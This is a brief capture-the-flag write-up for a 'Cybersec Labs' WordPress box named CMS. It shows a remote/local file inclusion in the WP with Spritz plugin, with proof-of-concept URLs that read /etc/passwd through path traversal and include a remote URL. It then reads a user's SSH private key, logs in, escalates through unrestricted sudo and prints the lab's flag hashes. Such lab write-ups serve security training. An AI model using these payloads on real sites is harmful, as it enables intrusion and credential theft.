172.31.1.8

Cybersec Labs CMS Writeup

Another wordpress site

Running WPscan we find /uploads directory

Which has a screenshot of an id_rsa file’s location which is in /home/angel/.ssh/id_rsa

also wpscan shows twenty twenty theme vulnerable

but cant find anything

But there’s a plugin with RFI

WordPress Plugin WP with Spritz 1.0 – Remote File Inclusion

Proof of Concept

/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd

/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec

so going to

It’s not properly formatted so viewing source code

we get private key for user angel

login via ssh

ssh -i id_rsa angel@172.31.1.8

Running sudo -l

User angel may run the following commands on cms:

    (ALL : ALL) NOPASSWD: ALL

So sudo su and we are root

root@cms:/home/angel# cat access.txt

d5ca58536a32935299d9f1026436f149

root@cms:~# cat system.txt

459daa8ee877e8048563ca65dc867afa

Author

Sentinal920